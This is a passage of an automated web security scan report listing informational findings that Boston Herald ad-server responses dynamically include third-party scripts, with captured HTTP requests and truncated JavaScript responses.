Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:45 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.268. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1210886297@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1210886297@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:39:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 22:40:44 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.269. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:18:57 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3622
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:10:00 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.270. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:50 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.271. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:02:19 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:53:22 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.272. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

Response

18.273. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:51 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.274. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:45:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:36:39 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.275. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://d3.zedo.com/jsc/d3/fo.js
http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:54 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.276. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:10:43 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:01:46 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.277. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:23:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3621
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:14:07 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.278. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:14:51 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3622
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:05:53 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.279. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

18.280. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:39:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n');

...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.281. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 13:39:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.282. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.283. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; __qca=P0-1247593866-1296251843767; RMFD=011PiwJwO101yed8|O3021J3t|O3021J48|P3021J4T|P2021J4m; __utmz=235728274.1296308367.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/71; __utma=235728274.1370509941.1296251844.1296251844.1296308367.2; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 335
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="10/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n'
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.284. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.285. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

18.286. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

18.287. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

18.288. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

18.289. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

http://d3.zedo.com/jsc/d3/fo.js

Request

Response

HTTP/1.1 200 OK
